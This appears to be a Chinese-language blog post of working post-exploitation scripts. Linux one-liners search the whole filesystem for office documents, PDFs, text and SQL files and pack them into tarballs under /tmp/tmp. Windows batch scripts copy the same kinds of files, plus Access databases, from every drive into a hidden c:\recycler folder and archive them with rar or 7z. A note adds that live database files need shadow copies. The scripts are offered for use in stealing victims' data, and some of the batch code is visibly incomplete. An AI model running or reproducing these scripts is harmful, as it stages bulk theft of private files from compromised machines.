- 发表于
- 周边
attention:without “&& echo ok”,the final tar -T xlsx.list -czf xlsx.tar.gz will fail
mkdir /tmp/tmp && find / -name "*.doc" > /tmp/tmp/doc.list && find / -name "*.docx" > /tmp/tmp/docx.list && find / -name "*.pdf" > /tmp/tmp/pdf.list && find / -name "*.txt" > /tmp/tmp/txt.list && find / -name "*.xls" > /tmp/tmp/xls.list && find / -name "*.xlsx" > /tmp/tmp/xlsx.list && tar -T /tmp/tmp/doc.list -czf /tmp/tmp/doc.tar.gz && tar -T /tmp/tmp/docx.list -czf /tmp/tmp/docx.tar.gz && tar -T /tmp/tmp/pdf.list -czf /tmp/tmp/pdf.tar.gz && tar -T /tmp/tmp/txt.list -czf /tmp/tmp/txt.tar.gz && tar -T /tmp/tmp/xls.list -czf /tmp/tmp/xls.tar.gz && tar -T /tmp/tmp/xlsx.list -czf /tmp/tmp/xlsx.tar.gz && echo ok
mkdir /tmp/tmp && find / -name "*.doc" -mtime -30 > /tmp/tmp/doc.list && find / -name "*.docx" -mtime -30 > /tmp/tmp/docx.list && find / -name "*.pdf" -mtime -30 > /tmp/tmp/pdf.list && find / -name "*.txt" -mtime -30 > /tmp/tmp/txt.list && find / -name "*.xls" -mtime -30 > /tmp/tmp/xls.list && find / -name "*.xlsx" -mtime -30 > /tmp/tmp/xlsx.list && tar -T /tmp/tmp/doc.list -czf /tmp/tmp/doc.tar.gz && tar -T /tmp/tmp/docx.list -czf /tmp/tmp/docx.tar.gz && tar -T /tmp/tmp/pdf.list -czf /tmp/tmp/pdf.tar.gz && tar -T /tmp/tmp/txt.list -czf /tmp/tmp/txt.tar.gz && tar -T /tmp/tmp/xls.list -czf /tmp/tmp/xls.tar.gz && tar -T /tmp/tmp/xlsx.list -czf /tmp/tmp/xlsx.tar.gz && echo ok
mkdir /tmp/tmp && find / -name "*.sql" > /tmp/tmp/tmp.list&& tar -T /tmp/tmp/tmp.list -czf /tmp/tmp/tmp.tar.gz&& echo ok
attention:7z.exe for x32 need a 7z.dll to performs well while 7z.exe for x64 needn’t) (rar.exe does not have the x86 or x64 isssue
---------------content of 1.bat--------------------------
@echo off
goto :main
这是注释:(for /f "delims="的作用为取消默认的以空格等符号作为分割符
dir /s 实现了linux中的find功能,for /r path %%i in (web.conf?g) do ... 也可以实现find功能,但是自己实现时发现for /r path ...中的path只能是一个具体路径,不能是变量,这样就不能遍历全部磁盘了)
set str=c d e f g h i j k l m n o p q r s t u v w x y z
if not exist c:\recycler (
md c:\recycler
md c:\recycler\tmp
if exist c:\recycler (
rd /s/q c:\recycler\tmp
md c:\recycler\tmp
for %%i in (%str%) do (
if exist %%i: (echo %%i:
for /f "delims=" %%j in ('dir /b /s "%%i:\*.doc"') do (
echo "yes" | copy "%%j" c:\recycler\tmp
echo %%j >> tmp.txt
for /f "delims=" %%j in ('dir /b /s "%%i:\*.docx"') do (
echo "yes" | copy "%%j" c:\recycler\tmp
echo %%j >> c:\recycler\tmp\tmp.txt
for /f "delims=" %%j in ('dir /b /s "%%i:\*.pdf"') do (
echo "yes" | copy "%%j" c:\recycler\tmp
echo %%j >> c:\recycler\tmp\tmp.txt
for /f "delims=" %%j in ('dir /b /s "%%i:\*.txt"') do (
echo "yes" | copy "%%j" c:\recycler\tmp
echo %%j >> c:\recycler\tmp\tmp.txt
for /f "delims=" %%j in ('dir /b /s "%%i:\*.xls"') do (
echo "yes" | copy "%%j" c:\recycler\tmp
echo %%j >> c:\recycler\tmp\tmp.txt
for /f "delims=" %%j in ('dir /b /s "%%i:\*.xlsx"') do (
echo "yes" | copy "%%j" c:\recycler\tmp
echo %%j >> c:\recycler\tmp\tmp.txt
copy rar.exe c:\recycler\rar.exe
echo "y" | del rar.exe
c:\recycler\rar.exe a -k -r -s -m1 c:\recycler\tmp\tmp.rar c:\recycler\tmp\*.*
echo ok
c:\recycler\7z a -t7z C:\recycler\tmp\test.7z C:\recycler\tmp\*.*
@echo off
goto :main
这是注释:(for /f "delims="的作用为取消默认的以空格等符号作为分割符
mdf和ldf文件无法直接复制,需要shadow copy
dir /s 实现了linux中的find功能,for /r path %%i in (web.conf?g) do ... 也可以实现find功能,但是自己实现时发现for /r path ...中的path只能是一个具体路径,不能是变量,这样就不能遍历全部磁盘了)
set str=c d e f g h i j k l m n o p q r s t u v w x y z
if not exist c:\recycler (
md c:\recycler
md c:\recycler\tmp
if exist c:\recycler (
rd /s/q c:\recycler\tmp
md c:\recycler\tmp
for %%i in (%str%) do (
if exist %%i: (echo %%i:
for /f "delims=" %%j in ('dir /b /s "%%i:\*.sql"') do (
echo "yes" | copy "%%j" c:\recycler\tmp
echo %%j >> c:\recycler\tmp\tmp.txt
for /f "delims=" %%j in ('dir /b /s "%%i:\*.mdb"') do (
echo "yes" | copy "%%j" c:\recycler\tmp
echo %%j >> c:\recycler\tmp\tmp.txt
copy rar.exe c:\recycler\rar.exe
echo "y" | del rar.exe
c:\recycler\rar.exe a -k -r -s -m1 c:\recycler\tmp\tmp.rar c:\recycler\tmp\*.*
echo ok